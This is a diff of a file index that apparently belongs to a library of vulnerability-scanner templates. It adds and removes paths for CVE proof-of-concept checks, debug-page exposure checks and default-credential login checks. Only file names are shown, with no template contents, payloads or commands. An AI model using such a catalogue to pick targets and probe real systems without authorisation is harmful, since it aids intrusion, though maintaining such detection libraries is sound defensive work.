./poc/cve/cve-2022-28079-6742.yaml -./poc/cve/cve-2022-28080(1).yaml ./poc/cve/cve-2022-28080-6743.yaml ./poc/cve/cve-2022-28219(1).yaml ./poc/cve/cve-2022-28363-6744.yaml ./poc/cve/cve-2022-28363-6745.yaml ./poc/cve/cve-2022-28365-6746.yaml ./poc/cve/cve-2022-28365-6747.yaml -./poc/cve/cve-2022-29014(1).yaml ./poc/cve/cve-2022-29014-6748.yaml ./poc/cve/cve-2022-29298-6749.yaml -./poc/cve/cve-2022-29299(1).yaml ./poc/cve/cve-2022-29303-6750.yaml ./poc/cve/cve-2022-29303-6751.yaml ./poc/cve/cve-2022-29303-6752.yaml @@ -42729,37 +42699,41 @@ ./poc/cve/cve-2022-29455(1).yaml ./poc/cve/cve-2022-29455.yaml ./poc/cve/cve-2022-29464-6753.yaml +./poc/cve/cve-2022-29548(1).yaml ./poc/cve/cve-2022-29548-6754.yaml -./poc/cve/cve-2022-30073(1).yaml +./poc/cve/cve-2022-30489(1).yaml ./poc/cve/cve-2022-30525(1).yaml ./poc/cve/cve-2022-30525-6755.yaml -./poc/cve/cve-2022-30776(1).yaml +./poc/cve/cve-2022-30777(1).yaml ./poc/cve/cve-2022-31268(1).yaml ./poc/cve/cve-2022-31268-6756.yaml ./poc/cve/cve-2022-31268-6757.yaml -./poc/cve/cve-2022-32007(1).yaml ./poc/cve/cve-2022-32015(1).yaml ./poc/cve/cve-2022-32018(1).yaml ./poc/cve/cve-2022-32022(1).yaml -./poc/cve/cve-2022-32025(1).yaml ./poc/cve/cve-2022-32026(1).yaml +./poc/cve/cve-2022-32028(1).yaml ./poc/cve/cve-2022-32159(1).yaml ./poc/cve/cve-2022-32159.yaml +./poc/cve/cve-2022-32409(1).yaml ./poc/cve/cve-2022-32409-6758.yaml ./poc/cve/cve-2022-32444-6759.yaml ./poc/cve/cve-2022-32444-6760.yaml +./poc/cve/cve-2022-33119(1).yaml ./poc/cve/cve-2022-33174(1).yaml ./poc/cve/cve-2022-33174-6761.yaml +./poc/cve/cve-2022-34046(1).yaml ./poc/cve/cve-2022-34046-6762.yaml -./poc/cve/cve-2022-34047(1).yaml ./poc/cve/cve-2022-34047-6763.yaml -./poc/cve/cve-2022-35416(1).yaml +./poc/cve/cve-2022-34048(1).yaml +./poc/cve/cve-2022-34049(1).yaml ./poc/cve/cve-2022-36883(1).yaml ./poc/cve/cve-2022-40684(1).yaml ./poc/cve/cve-2022-42889.yaml ./poc/cve/cve-2023-2523.yaml ./poc/cve/cve-2023-33246.yaml ./poc/cve/cve-2023-34039.yaml +./poc/cve/cve-2024-23334.yaml ./poc/cve/cve-annotate.yml ./poc/cve/cve2json.yml ./poc/cve/cve_rce2-1.yaml @@ -42874,7 +42848,7 @@ ./poc/cve/rce-CVE-2021-21224.yaml ./poc/cve/rconfig-cve-2019-16663.yml ./poc/cve/resin-cnnvd-200705-315-9865.yaml -./poc/cve/resin-cnnvd-200705-315-9866.yaml +./poc/cve/resin-cnnvd-200705-315-9867.yaml ./poc/cve/resin-cnnvd-200705-315.yaml ./poc/cve/resin-cnnvd-200705-315.yml ./poc/cve/ruijie-eweb-rce-cnvd-2021-09650.yml @@ -42893,6 +42867,7 @@ ./poc/cve/spring-cloud-cve-2020-5410.yml ./poc/cve/spring-cve-2016-4977.yaml ./poc/cve/spring-cve-2016-4977.yml +./poc/cve/springForShell-CVE-2022-22963.yaml ./poc/cve/springForShell-CVE-2022-22965.yaml ./poc/cve/spring_cloud_gateway_CVE_2022_22947.yaml ./poc/cve/spring_cloud_gateway_cve_2022_22947.yaml @@ -42935,29 +42910,29 @@ ./poc/cve/zimbra-cve-2019-9670-xxe.yml ./poc/debug/Django-DebugMode.yaml ./poc/debug/TopApp-AD_enable_tool_debug_php-RCE.yaml +./poc/debug/airflow-debug-231.yaml ./poc/debug/airflow-debug-232.yaml -./poc/debug/airflow-debug-233.yaml ./poc/debug/airflow-debug.yaml ./poc/debug/ampache-debug-page.yaml ./poc/debug/android-debug-database-exposed-312.yaml ./poc/debug/android-debug-database-exposed-313.yaml +./poc/debug/android-debug-database-exposed-314.yaml ./poc/debug/android-debug-database-exposed-315.yaml -./poc/debug/android-debug-database-exposed-316.yaml ./poc/debug/android-debug-database-exposed.yaml ./poc/debug/android-manifest-debuggable-enabled.yaml +./poc/debug/aspx-debug-mode-575.yaml ./poc/debug/aspx-debug-mode-576.yaml ./poc/debug/aspx-debug-mode-577.yaml -./poc/debug/aspx-debug-mode-578.yaml ./poc/debug/aspx-debug-mode-579.yaml ./poc/debug/bitrix-debug-file.yaml +./poc/debug/browserless-debugger-794.yaml ./poc/debug/browserless-debugger-795.yaml -./poc/debug/browserless-debugger.yaml ./poc/debug/checkGoDebug.yaml ./poc/debug/coldfusion-debug-xss-1.yaml ./poc/debug/coldfusion-debug-xss-1152.yaml +./poc/debug/coldfusion-debug-xss-1153.yaml ./poc/debug/coldfusion-debug-xss-1154.yaml ./poc/debug/coldfusion-debug-xss-2.yaml -./poc/debug/coldfusion-debug-xss.yaml ./poc/debug/configure-service-timestamps-debug.yaml ./poc/debug/debug-3c7881aeda959430760389337ec81437.yaml ./poc/debug/debug-assistant-2f45650a91c72711c9ed905e46c42126.yaml @@ -42972,7 +42947,8 @@ ./poc/debug/debug-bar-elasticpress-plugin.yaml ./poc/debug/debug-bar-elasticpress.yaml ./poc/debug/debug-bar.yaml -./poc/debug/debug-enabled-6788.yaml +./poc/debug/debug-enabled-6789.yaml +./poc/debug/debug-enabled-6790.yaml ./poc/debug/debug-enabled.yaml ./poc/debug/debug-functions-time-2df258451ffd3064fdb981dedfeff909.yaml ./poc/debug/debug-functions-time-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -43003,6 +42979,7 @@ ./poc/debug/django-debug-detect.yaml ./poc/debug/django-debug-enable.yaml ./poc/debug/django-debug-enabled.yaml +./poc/debug/django-debug-exposed-404.yaml ./poc/debug/django-debug-exposure-7028.yaml ./poc/debug/django-debug-exposure-7029.yaml ./poc/debug/django-debug-exposure-7030.yaml @@ -43032,10 +43009,8 @@ ./poc/debug/lanhaizhuoyue-debug-rce.yaml ./poc/debug/laravel-debug-enabled-8574.yaml ./poc/debug/laravel-debug-enabled-8575.yaml -./poc/debug/laravel-debug-enabled-8576.yaml ./poc/debug/laravel-debug-enabled-8577.yaml ./poc/debug/laravel-debug-enabled-8578.yaml -./poc/debug/laravel-debug-enabled.yaml ./poc/debug/laravel-debug-error-8579.yaml ./poc/debug/laravel-debug-error.yaml ./poc/debug/laravel-debug-info-leak.yaml @@ -43056,7 +43031,7 @@ ./poc/debug/pyramid-debug-toolbar-9741.yaml ./poc/debug/pyramid-debug-toolbar.yaml ./poc/debug/rails-debug-mode-9805.yaml -./poc/debug/rails-debug-mode-9807.yaml +./poc/debug/rails-debug-mode-9806.yaml ./poc/debug/rails-debug-mode.yaml ./poc/debug/sitecore-debug-page-10285.yaml ./poc/debug/sitecore-debug-page.yaml @@ -43067,6 +43042,7 @@ ./poc/debug/symfony-debug.yaml ./poc/debug/symfony-debugmode-10618.yaml ./poc/debug/symfony-debugmode-10619.yaml +./poc/debug/symfony-debugmode-10620.yaml ./poc/debug/symfony-debugmode-10621.yaml ./poc/debug/symfony-debugmode-10623.yaml ./poc/debug/symfony-debugmode.yaml @@ -43076,6 +43052,7 @@ ./poc/debug/wamp-xdebug-detect-11101.yaml ./poc/debug/wamp-xdebug-detect-11102.yaml ./poc/debug/wamp-xdebug-detect-11103.yaml +./poc/debug/wamp-xdebug-detect-11104.yaml ./poc/debug/wamp-xdebug-detect.yaml ./poc/debug/wamp-xdebug.yaml ./poc/debug/werkzeug-debug.yaml @@ -43085,7 +43062,7 @@ ./poc/debug/werkzeug-debugger-detect.yaml ./poc/debug/wordpress-debug-log-11256.yaml ./poc/debug/wordpress-debug-log-11257.yaml -./poc/debug/wordpress-debug-log-11258.yaml +./poc/debug/wordpress-debug-log-11259.yaml ./poc/debug/wordpress-debug-log.yaml ./poc/debug/wp-debug-log.yaml ./poc/debug/wp-debugging-0c12452c85fb9700ac837eef51c78541.yaml @@ -43113,18 +43090,18 @@ ./poc/default/JeeSite-default-login.yaml ./poc/default/Kingsoft-default-login.yaml ./poc/default/Konga-default-login.yaml +./poc/default/Mantis-Default_login.yaml ./poc/default/MinIO-default-login.yaml ./poc/default/NagiosXI-CMS-Default-Login.yaml ./poc/default/PFSense-Default-Login.yaml ./poc/default/PRTGNetwork-DefaultLogin.yaml -./poc/default/Redmine-Default-Login.yaml ./poc/default/TestLink-Default-Login.yaml ./poc/default/UniFi-Default-Login.yaml ./poc/default/ZoneMinder-Default-Login.yaml -./poc/default/activemq-default-login-44.yaml ./poc/default/activemq-default-login-45.yaml ./poc/default/activemq-default-login-46.yaml ./poc/default/activemq-default-login-47.yaml +./poc/default/activemq-default-login-48.yaml ./poc/default/activemq-default-password.yaml ./poc/default/activemq-default-password.yml ./poc/default/adobe-aem-default-credentials-1.yaml @@ -43142,8 +43119,8 @@ ./poc/default/aem-default-get-servlet-11.yaml ./poc/default/aem-default-get-servlet-12.yaml ./poc/default/aem-default-get-servlet-13.yaml +./poc/default/aem-default-get-servlet-135.yaml ./poc/default/aem-default-get-servlet-136.yaml -./poc/default/aem-default-get-servlet-137.yaml ./poc/default/aem-default-get-servlet-139.yaml ./poc/default/aem-default-get-servlet-14.yaml ./poc/default/aem-default-get-servlet-15.yaml @@ -43197,7 +43174,6 @@ ./poc/default/aem-default-get-servlet-8.yaml ./poc/default/aem-default-get-servlet-9.yaml ./poc/default/aem-default-get-servlet.yaml -./poc/default/aem-default-login-140.yaml ./poc/default/aem-default-login-141.yaml ./poc/default/aem-default-login-142.yaml ./poc/default/airflow-default-credentials.yaml @@ -43208,11 +43184,10 @@ ./poc/default/alibaba-canal-default-password.yml ./poc/default/alphaweb-default-login-276.yaml ./poc/default/alphaweb-default-login-277.yaml -./poc/default/alphaweb-default-login.yaml ./poc/default/ambari-default-credentials-286.yaml ./poc/default/ambari-default-credentials.yaml -./poc/default/ambari-default-login-287.yaml ./poc/default/ambari-default-login-288.yaml +./poc/default/ambari-default-login-289.yaml ./poc/default/ambari-default-login-290.yaml ./poc/default/ambari-default-password.yaml ./poc/default/ampjuke-default-login.yaml @@ -43222,8 +43197,7 @@ ./poc/default/apisix-default-login-491.yaml ./poc/default/apisix-default-login-492.yaml ./poc/default/apollo-default-login-520.yaml -./poc/default/apollo-default-login-521.yaml -./poc/default/arl-default-login-537.yaml +./poc/default/apollo-default-login.yaml ./poc/default/arl-default-login-538.yaml ./poc/default/arl-default-login-539.yaml ./poc/default/arl-default-login-540.yaml @@ -43241,9 +43215,9 @@ ./poc/default/axis2-default-password.yaml ./poc/default/azkaban-default-login-671.yaml ./poc/default/azkaban-default-login-672.yaml -./poc/default/azkaban-default-login-673.yaml ./poc/default/azkaban-default-login-674.yaml ./poc/default/azkaban-default-login-675.yaml +./poc/default/azkaban-default-login.yaml ./poc/default/azkaban-default-password.yaml ./poc/default/azkaban-web-client-default-creds.yaml ./poc/default/azure-default-page.yaml @@ -43253,13 +43227,12 @@ ./poc/default/businessintelligence-default-login-816.yaml ./poc/default/businessintelligence-default-login-817.yaml ./poc/default/cambium-networks-default-login.yaml +./poc/default/canal-default-login-846.yaml ./poc/default/canal-default-login-847.yaml ./poc/default/canal-default-login-848.yaml -./poc/default/canal-default-login-849.yaml ./poc/default/canal-default-login.yaml ./poc/default/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml ./poc/default/change-default-login-logo-url-and-title.yaml -./poc/default/chinaunicom-default-login-906.yaml ./poc/default/chinaunicom-default-login-907.yaml ./poc/default/chinaunicom-default-login-908.yaml ./poc/default/chinaunicom-default-login-909.yaml @@ -43270,13 +43243,13 @@ ./poc/default/ciphertrust-default-password-vulnerability.yaml ./poc/default/circarlife-default-login.yaml ./poc/default/cnzxsoft-information-security-management-system-default-account.yaml -./poc/default/cobbler-default-login-1119.yaml +./poc/default/cobbler-default-login-1118.yaml ./poc/default/cobbler-default-login-1120.yaml ./poc/default/cobbler-default-login-1121.yaml -./poc/default/cobbler-default-login.yaml ./poc/default/control4-default-login.yaml ./poc/default/corero-cms-default-login.yaml ./poc/default/corero-swa-default-login.yaml +./poc/default/crushftp-default-login.yaml ./poc/default/cs141-default-login-1.yaml ./poc/default/cs141-default-login-1277.yaml ./poc/default/cs141-default-login-1279.yaml @@ -43291,7 +43264,6 @@ ./poc/default/default-apache-test-all-6812.yaml ./poc/default/default-apache-test-all-6813.yaml ./poc/default/default-apache-test-all-6814.yaml -./poc/default/default-apache-test-all.yaml ./poc/default/default-apache-test-page-6816.yaml ./poc/default/default-apache-test-page-6817.yaml ./poc/default/default-apache-test-page-6818.yaml @@ -43304,13 +43276,11 @@ ./poc/default/default-apache2-ubuntu-page-6809.yaml ./poc/default/default-apache2-ubuntu-page-6810.yaml ./poc/default/default-apache2-ubuntu-page-6811.yaml -./poc/default/default-apache2-ubuntu-page.yaml ./poc/default/default-asp-6823.yaml ./poc/default/default-asp-net-page-6820.yaml ./poc/default/default-asp-net-page-6822.yaml ./poc/default/default-asp-net-page-6824.yaml ./poc/default/default-asp-net-page-6825.yaml -./poc/default/default-asp-net-page.yaml ./poc/default/default-asp.net-page.yaml ./poc/default/default-centos-test-page-6826.yaml ./poc/default/default-centos-test-page-6827.yaml @@ -43319,12 +43289,13 @@ ./poc/default/default-codeigniter-page-6830.yaml ./poc/default/default-codeigniter-page-6831.yaml ./poc/default/default-codeigniter-page-6832.yaml +./poc/default/default-codeigniter-page-6833.yaml ./poc/default/default-codeigniter-page-6834.yaml ./poc/default/default-config-6835.yaml ./poc/default/default-config.yaml ./poc/default/default-detect-generic-6837.yaml -./poc/default/default-detect-generic-6838.yaml ./poc/default/default-detect-generic-6839.yaml +./poc/default/default-detect-generic.yaml ./poc/default/default-django-page-6840.yaml ./poc/default/default-django-page-6841.yaml ./poc/default/default-django-page-6842.yaml @@ -43347,14 +43318,15 @@ ./poc/default/default-iis7-page-6859.yaml ./poc/default/default-iis7-page-6860.yaml ./poc/default/default-iis7-page-6861.yaml +./poc/default/default-jetty-page-6862.yaml ./poc/default/default-jetty-page-6863.yaml ./poc/default/default-jetty-page-6864.yaml ./poc/default/default-jetty-page-6865.yaml -./poc/default/default-lighttpd-page-6866.yaml ./poc/default/default-lighttpd-page-6867.yaml ./poc/default/default-lucee-page-6868.yaml ./poc/default/default-lucee-page-6869.yaml ./poc/default/default-lucee-page-6870.yaml +./poc/default/default-lucee-page-6871.yaml ./poc/default/default-lucee-page-6872.yaml ./poc/default/default-mag-42c8a5445d70abc166f93c14f3500712.yaml ./poc/default/default-mag.yaml @@ -43367,6 +43339,7 @@ ./poc/default/default-movable-page-6878.yaml ./poc/default/default-movable-page-6879.yaml ./poc/default/default-nginx-page-6880.yaml +./poc/default/default-nginx-page-6881.yaml ./poc/default/default-nginx-page-6882.yaml ./poc/default/default-nginx-page-6883.yaml ./poc/default/default-openresty-6884.yaml @@ -43374,13 +43347,13 @@ ./poc/default/default-openresty-6886.yaml ./poc/default/default-openresty-6887.yaml ./poc/default/default-openresty-6888.yaml +./poc/default/default-openresty.yaml ./poc/default/default-oracle-application-page-6889.yaml ./poc/default/default-oracle-application-page-6890.yaml ./poc/default/default-oracle-application-page-6891.yaml ./poc/default/default-oracle-application-page-6892.yaml ./poc/default/default-oracle-application-page-6893.yaml ./poc/default/default-oracle-application-page.yaml -./poc/default/default-payara-server-page-6894.yaml ./poc/default/default-payara-server-page-6895.yaml ./poc/default/default-payara-server-page-6896.yaml ./poc/default/default-payara-server-page-6897.yaml @@ -43388,8 +43361,6 @@ ./poc/default/default-plesk-page-6899.yaml ./poc/default/default-plesk-page-6900.yaml ./poc/default/default-plesk-page-6901.yaml -./poc/default/default-plesk-page.yaml -./poc/default/default-redhat-test-page-6902.yaml ./poc/default/default-redhat-test-page-6903.yaml ./poc/default/default-redhat-test-page-6904.yaml ./poc/default/default-redhat-test-page-6905.yaml @@ -43407,10 +43378,10 @@ ./poc/default/dell-emc-ecom-default-credentials-6917.yaml ./poc/default/dell-emc-ecom-default-credentials.yaml ./poc/default/dell-idrac-default-login-6942.yaml -./poc/default/dell-idrac-default-login-6943.yaml ./poc/default/dell-idrac-default-login-6944.yaml ./poc/default/dell-idrac-default-login-6945.yaml ./poc/default/dell-idrac-default-login-6946.yaml +./poc/default/dell-idrac-default-login.yaml ./poc/default/dell-idrac9-default-login-6930.yaml ./poc/default/dell-idrac9-default-login-6931.yaml ./poc/default/dell-idrac9-default-login-6932.yaml @@ -43425,6 +43396,7 @@ ./poc/default/dlink-ac-default-password.yaml ./poc/default/dlink-default-password.yaml ./poc/default/dolphinscheduler-default-login-7072.yaml +./poc/default/dolphinscheduler-default-login-7073.yaml ./poc/default/druid-default-login-1.yaml ./poc/default/druid-default-login-2.yaml ./poc/default/druid-default-login-7095.yaml @@ -43433,37 +43405,36 @@ ./poc/default/druid-default-login.yaml ./poc/default/druid-default-password-1.yaml ./poc/default/druid-default-password-2.yaml +./poc/default/dubbo-admin-default-login-7120.yaml ./poc/default/dubbo-admin-default-login-7121.yaml -./poc/default/dubbo-admin-default-login.yaml ./poc/default/dubbo-admin-default-password.yaml ./poc/default/dubbo-admin-default-password.yml ./poc/default/dvwa-default-login-7126.yaml -./poc/default/dvwa-default-login-7127.yaml ./poc/default/dvwa-default-login-7128.yaml ./poc/default/dvwa-default-login-7129.yaml +./poc/default/dvwa-default-login.yaml ./poc/default/elasticsearch-insecure-default-config.yaml -./poc/default/emcecom-default-login-7211.yaml ./poc/default/emcecom-default-login-7212.yaml ./poc/default/emcecom-default-login-7213.yaml ./poc/default/emcecom-default-login-7214.yaml ./poc/default/emqx-default-login-7221.yaml +./poc/default/emqx-default-login-7222.yaml ./poc/default/emqx-default-login.yaml ./poc/default/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/default/exacqvision-default-credentials.yaml ./poc/default/exacqvision-default-login-7274.yaml ./poc/default/exacqvision-default-login-7275.yaml ./poc/default/exacqvision-default-login-7276.yaml -./poc/default/exacqvision-default-login-7277.yaml +./poc/default/exacqvision-default-login.yaml ./poc/default/exacqvision-default-password.yaml ./poc/default/flir-ax8-default-credentials-7512.yaml ./poc/default/flir-ax8-default-credentials.yaml ./poc/default/flir-default-login-7513.yaml -./poc/default/flir-default-login-7514.yaml ./poc/default/flir-default-login-7515.yaml ./poc/default/flir-default-login-7516.yaml +./poc/default/flir-default-login.yaml ./poc/default/frp-default-credentials-7555.yaml ./poc/default/frp-default-credentials.yaml -./poc/default/frp-default-login-7556.yaml ./poc/default/frp-default-login-7557.yaml ./poc/default/frp-default-login-7558.yaml ./poc/default/frp-default-login-7559.yaml @@ -43478,6 +43449,7 @@ ./poc/default/glpi-default-login-7731.yaml ./poc/default/glpi-default-login-7732.yaml ./poc/default/glpi-default-login-7733.yaml +./poc/default/glpi-default-login.yaml ./poc/default/gophish-default-login-7792.yaml ./poc/default/gophish-default-login-7793.yaml ./poc/default/gophish-default-login-7794.yaml @@ -43495,14 +43467,15 @@ ./poc/default/grafana-default-password.yml ./poc/default/graphite-browser-default-credential.yaml ./poc/default/guacamole-default-login-7858.yaml +./poc/default/guacamole-default-login-7859.yaml ./poc/default/guacamole-default-login-7860.yaml ./poc/default/guacamole-default-login-7861.yaml ./poc/default/hikvision-intercom-service-default-password.yaml ./poc/default/hikvision-intercom-service-default-password.yml ./poc/default/hongdian-default-login-1.yaml ./poc/default/hongdian-default-login-2.yaml +./poc/default/hongdian-default-login-7997.yaml ./poc/default/hongdian-default-login-7998.yaml -./poc/default/hongdian-default-login-7999.yaml ./poc/default/hongdian-default-password-1.yaml ./poc/default/hongdian-default-password-2.yaml ./poc/default/hortonworks-smartsense-default-credentials.yaml @@ -43511,13 +43484,10 @@ ./poc/default/hp-switch-default-login-8037.yaml ./poc/default/hp-switch-default-login-8038.yaml ./poc/default/huawei-HG532e-default-login.yaml -./poc/default/huawei-HG532e-default-router-login.yaml ./poc/default/huawei-hg532e-default-router-login-8062.yaml ./poc/default/huawei-hg532e-default-router-login-8063.yaml ./poc/default/huawei-hg532e-default-router-login-8064.yaml ./poc/default/hue-default-credential-8080.yaml -./poc/default/hue-default-credential-8081.yaml -./poc/default/hue-default-credential.yaml ./poc/default/ibm-dcbc-default-login.yaml ./poc/default/ibm-dcec-default-login.yaml ./poc/default/ibm-dsc-default-login.yaml @@ -43531,36 +43501,35 @@ ./poc/default/ibm-storage-default-password.yaml ./poc/default/idemia-biometrics-default-credentials.yaml ./poc/default/idemia-biometrics-default-login-8138.yaml -./poc/default/idemia-biometrics-default-login-8139.yaml ./poc/default/idemia-biometrics-default-login-8140.yaml -./poc/default/idemia-biometrics-default-login.yaml +./poc/default/idemia-biometrics-default-login-8141.yaml ./poc/default/iis-default-page.yaml ./poc/default/imm-default-login.yaml ./poc/default/inspur-clusterengine-default-login-8162.yaml ./poc/default/iptime-default-login-8192.yaml -./poc/default/iptime-default-login-8193.yaml ./poc/default/iptime-default-login-8194.yaml ./poc/default/jboss-default-password.yaml ./poc/default/jenkins-default-8270.yaml ./poc/default/jenkins-default-8271.yaml +./poc/default/jenkins-default-8272.yaml ./poc/default/jenkins-default-8273.yaml ./poc/default/jenkins-default-login.yaml ./poc/default/jenkins-default-pwd.yaml -./poc/default/jenkins-default.yaml ./poc/default/jinher-oa-c6-default-password.yaml ./poc/default/jinher-oa-c6-default-password.yml ./poc/default/jinher-oa-default-login-8311.yaml +./poc/default/jinher-oa-default-login-8312.yaml ./poc/default/jira-login-default.yaml ./poc/default/jmx-default-login-8354.yaml -./poc/default/jmx-default-login-8355.yaml ./poc/default/jmx-default-login-8356.yaml +./poc/default/jmx-default-login.yaml ./poc/default/jmx-default-password.yaml ./poc/default/jupyterhub-default-login-8399.yaml -./poc/default/jupyterhub-default-login-8400.yaml ./poc/default/jupyterhub-default-login-8401.yaml ./poc/default/kafka-center-default-login-8415.yaml ./poc/default/kafka-center-default-login-8416.yaml ./poc/default/kafka-center-default-login-8417.yaml +./poc/default/kafka-center-default-login.yaml ./poc/default/kafka-center-default-password.yaml ./poc/default/kingsoft-v8-default-password.yaml ./poc/default/kingsoft-v8-default-password.yml @@ -43569,9 +43538,9 @@ ./poc/default/lighttpd-default-8628.yaml ./poc/default/lighttpd-default.yaml ./poc/default/lutron-iot-default-login-8674.yaml +./poc/default/lutron-iot-default-login-8675.yaml ./poc/default/lutron-iot-default-login-8676.yaml ./poc/default/lutron-iot-default-login-8677.yaml -./poc/default/lutron-iot-default-login-8678.yaml ./poc/default/lutron-iot-default-login.yaml ./poc/default/mantisbt-default-credential-8778.yaml ./poc/default/mantisbt-default-credential-8779.yaml @@ -43595,15 +43564,15 @@ ./poc/default/nacos-default-password.yaml ./poc/default/nagios-default-credential-8989.yaml ./poc/default/nagios-default-credential.yaml +./poc/default/nagios-default-login-8990.yaml ./poc/default/nagios-default-login-8991.yaml ./poc/default/nagios-default-login-8992.yaml ./poc/default/nagios-default-login-8993.yaml -./poc/default/nagios-default-login-8994.yaml ./poc/default/netentsec-icg-default-password.yaml ./poc/default/netentsec-icg-default-password.yml ./poc/default/netsus-default-login-9058.yaml ./poc/default/netsus-default-login-9059.yaml -./poc/default/netsus-default-login-9060.yaml +./poc/default/netsus-default-login.yaml ./poc/default/nexus-default-login-9086.yaml ./poc/default/nexus-default-login-9087.yaml ./poc/default/nexus-default-login-9088.yaml @@ -43614,32 +43583,28 @@ ./poc/default/nps-default-login-9142.yaml ./poc/default/nps-default-login-9143.yaml ./poc/default/nps-default-login-9144.yaml -./poc/default/nps-default-login-9145.yaml ./poc/default/nps-default-password-9147.yaml ./poc/default/nps-default-password.yaml ./poc/default/nps-default-password.yml ./poc/default/ns-icg-default-password.yaml ./poc/default/nsicg-default-password.yaml ./poc/default/o2-default-password.yaml -./poc/default/octobercms-default-login-9192.yaml ./poc/default/octobercms-default-login-9193.yaml +./poc/default/octobercms-default-login.yaml ./poc/default/ofbiz-default-credentials-9207.yaml ./poc/default/ofbiz-default-credentials.yaml ./poc/default/ofbiz-default-login-9208.yaml ./poc/default/ofbiz-default-login-9209.yaml -./poc/default/ofbiz-default-login-9210.yaml ./poc/default/ofbiz-default-login-9211.yaml ./poc/default/ofbiz-default-password.yaml ./poc/default/openemr-default-login-9270.yaml -./poc/default/openemr-default-login.yaml ./poc/default/openerp-default-password.yaml ./poc/default/openwrt-default-login-9332.yaml ./poc/default/openwrt-default-login.yaml ./poc/default/operations-automation-default-page-9336.yaml -./poc/default/operations-automation-default-page-9337.yaml ./poc/default/operations-automation-default-page-9338.yaml +./poc/default/operations-automation-default-page-9339.yaml ./poc/default/operations-automation-default-page-9340.yaml -./poc/default/operations-automation-default-page.yaml ./poc/default/oracle-bi-default-credentials.yaml ./poc/default/panabit-default-login-9437.yaml ./poc/default/panabit-default-login-9438.yaml @@ -43651,15 +43616,18 @@ ./poc/default/panabit-gateway-default-password.yaml ./poc/default/panabit-gateway-default-password.yml ./poc/default/panabit-ixcache-default-login-9443.yaml +./poc/default/panabit-ixcache-default-login.yaml ./poc/default/panabit-ixcache-default-password.yaml ./poc/default/panabit-ixcache-default-password.yml ./poc/default/panos-default-credentials.yaml ./poc/default/panos-default-login-9454.yaml +./poc/default/panos-default-login-9455.yaml ./poc/default/panos-default-login-9456.yaml ./poc/default/panos-default-login-9457.yaml +./poc/default/panos-default-login.yaml ./poc/default/pentaho-default-login-9477.yaml -./poc/default/pentaho-default-login-9478.yaml ./poc/default/pentaho-default-login-9479.yaml +./poc/default/pentaho-default-login-9480.yaml ./poc/default/pentaho-default-login.yaml ./poc/default/peoplesoft-default-login.yaml ./poc/default/pgsql-default-db.yaml @@ -43667,8 +43635,8 @@ ./poc/default/phpmyadmin-default-page.yaml ./poc/default/poc-yaml-otter-default-password.yaml ./poc/default/postgres-default-logins.yaml +./poc/default/rabbitmq-default-admin-9780.yaml ./poc/default/rabbitmq-default-admin-9781.yaml -./poc/default/rabbitmq-default-admin-9782.yaml ./poc/default/rabbitmq-default-admin.yaml ./poc/default/rabbitmq-default-login-9783.yaml ./poc/default/rabbitmq-default-login-9784.yaml @@ -43679,15 +43647,18 @@ ./poc/default/rainloop-default-login-9811.yaml ./poc/default/rainloop-default-login-9812.yaml ./poc/default/rainloop-default-login-9813.yaml +./poc/default/rainloop-default-login.yaml ./poc/default/rancher-default-login-9814.yaml ./poc/default/rancher-default-login-9815.yaml ./poc/default/rancher-default-login-9816.yaml ./poc/default/rancher-default-password.yaml +./poc/default/ranger-default-login-9827.yaml ./poc/default/ranger-default-login-9828.yaml ./poc/default/redfish-bmc-default-login.yaml ./poc/default/redis-default-logins.yaml ./poc/default/rockmongo-default-credentials-9896.yaml ./poc/default/rockmongo-default-credentials.yaml +./poc/default/rockmongo-default-login-9897.yaml ./poc/default/rockmongo-default-login-9898.yaml ./poc/default/rockmongo-default-login-9899.yaml ./poc/default/rockmongo-default-login-9900.yaml @@ -43705,6 +43676,7 @@ ./poc/default/samsung-wlan-default-login-10015.yaml ./poc/default/samsung-wlan-default-login-10016.yaml ./poc/default/samsung-wlan-default-login-10017.yaml +./poc/default/samsung-wlan-default-login-10018.yaml ./poc/default/secnet-ac-default-login-10113.yaml ./poc/default/secnet-ac-default-login.yaml ./poc/default/secnet-ac-default-password.yaml @@ -43751,17 +43723,19 @@ ./poc/default/stackstorm-default-login.yaml ./poc/default/structurizr-default-login.yaml ./poc/default/supermicro-default-login-10572.yaml +./poc/default/supermicro-default-login.yaml ./poc/default/superset-default-login-10573.yaml ./poc/default/superset-default-login-10574.yaml ./poc/default/superset-default-login.yaml ./poc/default/szhe-default-login-10635.yaml ./poc/default/szhe-default-login-10636.yaml ./poc/default/szhe-default-login-10637.yaml -./poc/default/szhe-default-login.yaml +./poc/default/szhe-default-login-10638.yaml ./poc/default/szhe-default-password-10639.yaml ./poc/default/szhe-default-password-10640.yaml ./poc/default/szhe-default-password.yaml ./poc/default/telecom-gateway-default-login-10686.yaml +./poc/default/telecom-gateway-default-login.yaml ./poc/default/telecom-gateway-default-password.yaml ./poc/default/telecom-gateway-default-password.yml ./poc/default/timekeeper-default-login.yaml @@ -43770,6 +43744,7 @@ ./poc/default/tomcat-default-login-10789.yaml ./poc/default/tomcat-default-login-10790.yaml ./poc/default/tomcat-default-login-10791.yaml +./poc/default/tomcat-default-login.yaml ./poc/default/tomcat-default-manager.yaml ./poc/default/tomcat-manager-default-1.yaml ./poc/default/tomcat-manager-default-10.yaml @@ -43790,15 +43765,15 @@ ./poc/default/tomcat-manager-default-creds.yaml ./poc/default/tomcat-manager-default.yaml ./poc/default/tplink-r470gp-default-login.yaml -./poc/default/trilithic-viewpoint-default-10835.yaml ./poc/default/trilithic-viewpoint-default-10836.yaml ./poc/default/trilithic-viewpoint-default-password.yaml ./poc/default/trilithic-viewpoint-default.yaml ./poc/default/tyan-megarac-sp-default-login.yaml ./poc/default/tyan-rmm-bmc-default-login.yaml ./poc/default/ucmdb-default-login-10868.yaml -./poc/default/ucmdb-default-login-10869.yaml ./poc/default/ucmdb-default-login-10870.yaml +./poc/default/ucmdb-default-login-10871.yaml +./poc/default/ucmdb-default-login.yaml ./poc/default/utt-default-password.yaml ./poc/default/versa-default-login-11002.yaml ./poc/default/versa-default-login-11003.yaml @@ -43806,9 +43781,9 @@ ./poc/default/versa-default-password.yaml ./poc/default/versa-flexvnf-ui-default-login.yaml ./poc/default/vidyo-default-login-11008.yaml -./poc/default/vidyo-default-login-11009.yaml -./poc/default/vidyo-default-login.yaml +./poc/default/vidyo-default-login-11010.yaml ./poc/default/visionhub-default-credentials.yaml +./poc/default/visionhub-default-login-11026.yaml 